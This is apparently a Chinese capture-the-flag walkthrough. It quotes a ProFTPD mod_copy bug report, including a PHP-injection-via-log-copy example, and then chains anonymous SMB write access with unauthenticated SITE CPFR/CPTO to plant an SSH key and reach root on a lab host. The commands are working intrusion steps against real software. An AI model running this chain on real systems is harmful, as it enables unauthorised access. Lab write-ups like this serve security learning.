350 File or directory exists, ready for destination name
site cpto /var/www/test.php
test.php now contains
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
phpinfo(); ?>' for copying: Permission denied
-----------------------
test.php contains contain correct php script "<?php phpinfo(); ?>" which
can be run by the php interpreter
Source: http://bugs.proftpd.org/show_bug.cgi?id=4169
翻译:
描述 TJ·桑德斯 2015年4月7日 16:35:03 世界协调时间
瓦迪姆·梅利霍夫报告了一个使用mod_copy模块的ProFTPD安装程序存在的严重问题
mod_copy模块的SITE CPFR/SITE CPTO命令;mod_copy允许
未经过身份验证的客户端使用这些命令:
正在连接80.150.216.115...
已连接到80.150.216.115。
退出字符是'^]'。
220 ProFTPD 1.3.5rc3 服务器 (Debian) [::ffff:80.150.216.115]
site help
214-识别以下SITE命令(*表示未实现)
214-CPFR <空格> 路径名
214-CPTO <空格> 路径名
214-UTIME <空格> 年月日时分[秒] <空格> 路径
214-符号链接 <空格> 源文件 <空格> 目标文件
214-删除目录 <空格> 路径
214-创建目录 <空格> 路径
214-识别以下SITE扩展命令:
214-比率 -- 显示所有生效的比率
214-配额
214-帮助
214-更改组
214-更改权限
214 请将意见直接发送至root@www01a
site cpfr /etc/passwd
350 文件或目录已存在,准备接收目标名称
site cpto /tmp/passwd.copy
250 复制成功
他提供了另一个更可怕的示例:
site cpfr /etc/passwd
350 文件或目录已存在,准备接收目标名称
site cpto <?php phpinfo(); ?>
550 cpto: 权限被拒绝
site cpfr /proc/self/fd/3
350 文件或目录已存在,准备接收目标名称
site cpto /var/www/test.php
test.php文件现在包含
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): 回滚记分板错误:参数无效
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP会话已开启。
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): 打开用于复制的目标文件'/<?php
phpinfo(); ?>'错误:权限被拒绝
-----------------------
test.php包含正确的PHP脚本"<?php phpinfo(); ?>",
该脚本可由PHP解释器运行
来源:http://bugs.proftpd.org/show_bug.cgi?id=4169
ProFTPD 1.3.5 的 mod_copy 模块允许 未登录、匿名用户直接使用 2 条 FTP 命令:
SITE CPFR 【源路径】= 告诉我要复制哪个文件SITE CPTO 【目标路径】= 复制到哪个位置
不需要用户名、不需要密码,连上 FTP 就能用。
好现在的问题是我们该复制什么文件呢?
回到之前的端口扫描
我们之前扫到了samba
Samba 是 Linux/Unix 系统上实现 SMB/CIFS 协议的开源软件,核心用途是实现 Linux 与 Windows 跨平台文件 / 打印机共享,也可用于 Linux 间共享。
我们可以先查看帮助
smbclient -h
我们可以用smbmap枚举目标主机的 SMB 共享资源及权限
smbmap -H 192.168.59.148
翻译:
[+] Initializing hosts..
[+] 初始化主机列表...
[-] Authenticating...
[-] 正在认证...
[+] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] 已建立 1 个 SMB 连接,0 个已认证会话
(说明:匿名登录成功,不需要账号密码)
[+] IP: 192.168.59.148:445 Name: 192.168.59.148
[+] 目标IP:192.168.59.148 端口:445(SMB 主端口)
Status: NULL Session
状态:NULL 会话(即匿名登录)
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS 打印机驱动程序共享
smbdata READ, WRITE 自定义共享(有读写权限)
smbuser NO ACCESS 用户共享
IPC$ NO ACCESS IPC 命名管道(临时通信)
可以看出samba允许匿名登录
发现了可写共享:smbdata
还有一个smbuser的账户
smbuser NO ACCESS smbuser
第一个smbuser:共享名 → 这个共享文件夹叫 smbuser
NO ACCESS:匿名用户(NULL Session)无权限访问 → 用空账号空密码进不去
第二个smbuser:共享的备注(Comment) → 说明这个共享是给smbuser这个用户用的,对应/home/smbuser/目录
我们直接进入共享看看
smbclient //192.168.59.148/smbdata -N
成功进来了
查看一下内容
最底下发现了一个公钥文件
结合我们之前发现的漏洞以及信息
我们可以推理出用自己的公钥文件替换samba上面的公钥文件然后用文件复制漏洞将替换好的公钥文件复制到
smbuser的远程登录文件夹里面然后就可以远程登录smbuser了
我们用kali生成一份远程登录公钥文件
ssh-keygen -t rsa
一路回车不要设置密码
查看一下生成好的公钥
cat /root/.ssh/id_rsa.pub
切换到samba的窗口
先删除之前的文件
del authorized_keys
再将刚刚生成好的公钥重命名导入
put /root/.ssh/id_rsa.pub authorized_keys
好上传成功
然后我们利用刚刚的漏洞
先连接2121端口的ftp
nc 192.168.59.148 2121
然后将刚刚samba上传的文件复制到/home/smbuser/.ssh下
SITE CPFR /smbdata/authorized_keys
SITE CPTO /home/smbuser/.ssh/authorized_keys
成功了
我们远程登录一下
成功登录
下面该提权了
发现sudo -l 需要密码
我们之前在80网页上还获取过一个密码
我们尝试直接切换root用户输入该密码
发现成功登录
获得root权限
我们去root家目录里面查看最终flag
成功获得最终flag!!!
浙公网安备 33010602011771号